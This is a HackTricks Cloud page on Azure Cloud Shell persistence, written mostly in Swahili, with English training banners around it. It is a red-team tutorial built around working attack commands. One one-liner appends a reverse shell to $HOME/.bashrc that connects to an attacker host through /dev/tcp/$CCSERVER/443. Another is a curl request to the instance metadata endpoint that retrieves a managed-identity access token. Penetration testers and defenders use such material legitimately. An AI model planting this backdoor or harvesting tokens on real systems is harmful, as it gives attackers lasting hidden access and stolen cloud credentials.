Files
hacktricks-cloud/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md

3.5 KiB

Az - Cloud Shell Persistence

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Cloud Shell Persistence

Azure Cloud Shell inatoa ufikiaji wa amri ili kudhibiti rasilimali za Azure kwa hifadhi ya kudumu na uthibitishaji wa kiotomatiki. Washambuliaji wanaweza kutumia hili kwa kuweka backdoors katika saraka ya nyumbani ya kudumu:

  • Persistent Storage: Saraka ya nyumbani ya Azure Cloud Shell imewekwa kwenye sehemu ya faili ya Azure na inabaki salama hata baada ya kikao kumalizika.
  • Startup Scripts: Faili kama .bashrc zinafanya kazi kiotomatiki mwanzoni mwa kila kikao, kuruhusu utekelezaji wa kudumu wakati shell ya wingu inaanza.

Mfano wa backdoor katika .bashrc:

{% code overflow="wrap" %}

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc

{% endcode %}

Backdoor hii inaweza kutekeleza amri hata dakika 5 baada ya shell ya wingu kumalizika na mtumiaji.

Zaidi ya hayo, uliza huduma ya metadata ya Azure kwa maelezo ya mfano na tokeni: {% code overflow="wrap" %}

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s

{% endcode %}

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}